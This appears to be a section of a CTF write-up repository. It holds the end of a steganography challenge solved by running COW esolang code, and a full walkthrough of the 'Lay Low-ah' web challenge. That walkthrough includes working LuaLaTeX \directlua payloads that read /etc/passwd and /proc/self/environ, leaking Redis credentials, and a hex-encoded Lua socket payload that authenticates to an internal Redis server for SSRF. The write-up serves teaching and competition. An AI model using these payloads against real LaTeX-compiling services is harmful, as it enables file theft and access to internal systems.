31 | MoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoO
32 | MMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMM
33 | moOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOo
34 | mOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoOMoOMoO
35 | MoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoO
36 | moOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMM
37 | moOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOo
38 | mOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoOMoOMoo
39 | mOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOO
40 | MOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoO
41 | MoomOoOOOmoOOOOmOomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOomOoMMM
42 | moOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMM
43 | moOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOo
44 | mOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoomOoOOOmoOOOOmOomOo
45 | MMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOo
46 | mOomOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoomOoOOOmoO
47 | OOOmOomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoO
48 | MoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoo
49 | mOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoOMoOMoO
50 | MoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOo
51 | MMMmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoO
52 | MoOMoOMoOMoOMoomOoOOOmoOOOOmOomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoo
53 | moOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOO
54 | mOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOo
55 | moomoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOo
56 | mOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoo
57 | moOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoo
58 | mOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOOMOo
59 | moOMoOmOomoomoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOo
60 | moOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOomOoMMMmoOmoO
61 | moOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoOMoOMoOMoomOoOOOmoOOOOmOomOo
62 | mOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOOMOomoO
63 | MoOmOomoomoOMoOMoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOo
64 | moomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOO
65 | MOomoOMoOmOomoomoOMoOMoOMoomOoOOOmoOOOOmOomOomOoMMMmoOmoOMMMMOOMOo
66 | moOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoO
67 | MoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoO
68 | moOMMMMOOMOomoOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoo
69 | moOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoOMoomOo
70 | ```
71 | 
72 | I recognized this text when I first saw this as the programming language called COW, an esoteric programming language created in the 90's, Now we only need to find an interpreter for this code, I used a random one after a quick google search and run it on the code:
73 | 
74 | ![](https://cdn.discordapp.com/attachments/635278809741918218/1033553913049272441/unknown.png)
75 | 
76 | and we got our cow-scented flag.
77 | 
78 | **Resources:**
79 | * steghide: http://steghide.sourceforge.net/
80 | * COW programming language: https://esolangs.org/wiki/COW
81 | * COW interpreter: http://www.frank-buss.de/cow.html
82 | 
83 | 


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/web/lay-lowah/README.md:
--------------------------------------------------------------------------------
  1 | # Lay Low-ah
  2 | 
  3 | ## Writeup
  4 | 
  5 | 1. First of all, we try to load files using input and include, but it doesn't seem to work.
  6 | 
  7 | 2. From the description we understand that it's one of the latex compilers for linux, and from the name of the challenge, we can guess that it's `LuaLaTeX`.
  8 | 
  9 | 3. Lualatex offers a command to execute lua code, which is `\directlua`, and we're going to use it in order to exfiltrate all the infos that we need.
 10 | 
 11 | 4. We'll try to read files with it:
 12 | 
 13 |     ```latex
 14 |     \documentclass{book}
 15 |     \begin{document}
 16 |     \directlua{
 17 | 
 18 |         local file = io.open("/etc/passwd", "r")
 19 |         local text = file:read("*all")
 20 |         file:close()
 21 |         tex.print(-2, text)
 22 | 
 23 |     }
 24 |     adscrf
 25 |     \end{document}
 26 |     ```
 27 | 
 28 |     We can see that it works!
 29 | 
 30 | 5. Since it's a flask app, we can guess `app.py` file, we'll try to read it:
 31 | 
 32 |     ```python
 33 |     #!/usr/bin/python3
 34 | 
 35 |     from flask import Flask, request, render_template, redirect, url_for, make_response
 36 |     from utils import PDF, remove_pdfs, make_cache_key
 37 |     from flask_caching import Cache, CachedResponse
 38 | 
 39 |     app = Flask(__name__)
 40 |     app.config.from_object('config.BaseConfig')  
 41 |     cache = Cache(app)
 42 | 
 43 | 
 44 |     @app.route("/", methods=["GET", "HEAD"])
 45 |     def root():
 46 |         return redirect(url_for("compile"))
 47 | 
 48 | 
 49 |     @app.route("/compile", methods=["GET", "POST", "HEAD"])
 50 |     @cache.cached(timeout=30, key_prefix=make_cache_key)
 51 |     def compile():
 52 |         pdf = None
 53 | 
 54 |         if request.method == "GET":
 55 |             return render_template("./compile.html", pdf=pdf)
 56 |         elif request.method == "POST":
 57 |             latex_text = request.form.get("latex_text")
 58 | 
 59 |             try:
 60 |                 pdf = PDF(latex_text).generate_pdf()
 61 |                 if pdf is not None:
 62 |                     result = "Compiled successfully!"
 63 |                     return CachedResponse(
 64 |                         response=make_response(
 65 |                             render_template(
 66 |                                 "./compile.html", result=result, pdf=pdf
 67 |                             )
 68 |                         )
 69 |                         ,timeout=50,
 70 |                     )
 71 |                 else:
 72 |                     raise Exception("")
 73 |             except Exception as e:
 74 |                 print(e)
 75 |                 result = "something is going wrong"
 76 |                 pdf = None
 77 |                 return render_template("./compile.html", result=result, pdf=pdf)
 78 |         else:
 79 |             return render_template("./compile.html")
 80 |     ```
 81 | 
 82 | 6. We notice that it's using flask_caching, hence the optimization in the rendering as it's mentioned in the description. After some documentation, we understand that the config of caching it's imported from `config.py` here:
 83 | 
 84 |     ```python
 85 |     app.config.from_object('config.BaseConfig')
 86 |     ```
 87 | 
 88 | 7. We dump the `config.py`:
 89 | 
 90 |     ```python
 91 |     import os
 92 | 
 93 |     URL = "http://localhost:8000"
 94 | 
 95 | 
 96 |     class BaseConfig(object):
 97 |         CACHE_TYPE = os.environ['CACHE_TYPE']
 98 |         CACHE_REDIS_HOST = os.environ['CACHE_REDIS_HOST']
 99 |         CACHE_REDIS_PORT = os.environ['CACHE_REDIS_PORT']
100 |         CACHE_REDIS_DB = os.environ['CACHE_REDIS_DB']
101 |         CACHE_REDIS_URL = os.environ['CACHE_REDIS_URL']
102 |         CACHE_DEFAULT_TIMEOUT = os.environ['CACHE_DEFAULT_TIMEOUT']
103 |         # os.system('lua /ctf/insert_flag.lua')
104 |         # os.system('rm /ctf/insert_flag.lua')
105 |     ```
106 | 
107 | 8. We see that it's using Redis for caching, and from the 2 last lines, we can deduct that probably the flag is pushed to redis and it's not anymore on the server.
108 | 
109 | 9. We can retrieve the environment variables from `/proc/self/environ` file:
110 | 
111 |     ```env
112 |     HOSTNAME=5010384e97f6
113 |     CACHE_REDIS_URL=redis://:JtmvalTXG91siKBIrCxmsDfXNfkl8Gck@cache:6379/0
114 |     PWD=/ctf
115 |     CACHE_TYPE=redis
116 |     HOME=/root
117 |     LANG=CUTF-8T
118 |     EXLIVE_INSTALL_NO_CONTEXT_CACHE=1
119 |     CACHE_REDIS_HOST=cache
120 |     TERM=xterm
121 |     CACHE_REDIS_DB=0
122 |     SHLVL=1
123 |     CACHE_REDIS_PORT=6379
124 |     FLASK_DEBUG=production
125 |     LC_ALL=C.UTF-8
126 |     CACHE_DEFAULT_TIMEOUT=500
127 |     PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
128 |     NOPERLDOC=1_=/bin/cat
129 |     ```
130 | 
131 | 10. Now, we have redis credentials, we have to be able to communicate with redis server using Lua.
132 | 
133 | 11. Trying to use redis packages won't help because they are not installed. But if we check `socket` one, we find that it works.  
134 | 
135 |     Redis doesn't support http requests, even socket module doesn't support gopher protocol, so we are obliged to communicate with redis by using tcp socket and send the exact syntax that redis uses.  
136 |     After documentation, the syntax is:
137 | 
138 |     ```lua
139 |     "*2\r\n$4\r\nGET\r\n$1\r\n*\r\n"
140 |     ```
141 | 
142 |     This line will get all entries.  
143 |     We will start to craft our payload.
144 | 
145 | 12. We notice that Latex has a problem with all these special chars, so we will use Hexadecimal instead, decode it then send it.
146 | 
147 | 13. Without forgeting the authentication part, and after printing all the keys, we find that flag is `FLAG`.
148 | 
149 |     So the final payload is:  
150 | 
151 |     ```lua
152 |     "*2\r\n$4\r\nAUTH\r\n$32\r\nJtmvalTXG91siKBIrCxmsDfXNfkl8Gck\r\n*2\r\n$3\r\nGET\r\n$4\r\nFLAG\r\n"
153 |     ```
154 | 
155 |     And here's the latex document to send:
156 | 
157 |     ```latex
158 |     \documentclass{book}
159 |     \begin{document}
160 |     \directlua{
161 |         function fromHex(str)
162 |             return (str:gsub('..', function (cc)
163 |                 return string.char(tonumber(cc, 16))
164 |             end))
165 |         end
166 |         str = "2a320d0a24340d0a415554480d0a2433320d0a4a746d76616c545847393173694b42497243786d734466584e666b6c3847636b0d0a2a320d0a24330d0a4745540d0a24340d0a464c41470d0a"
167 |         local res = fromHex(str)
168 |         local host, port = "cache", 6379
169 |         local socket = require("socket")
170 |         local tcp = assert(socket.tcp())
171 |         tcp:connect(host, port);
172 |         tcp:send(res);
173 |         tcp:settimeout(2)
174 |         for i=1,3 do
175 |             local s, status, partial = tcp:receive()
176 |             tex.print(-2,s,partial)
177 |         end
178 |         tcp:close()
179 |     }
180 |     \end{document}
181 |     ```
182 | 
183 | 14. The flag is `CyberErudites{r3d1s_0bv105l7y_m34n5_55RF}`.
184 | 


--------------------------------------------------------------------------------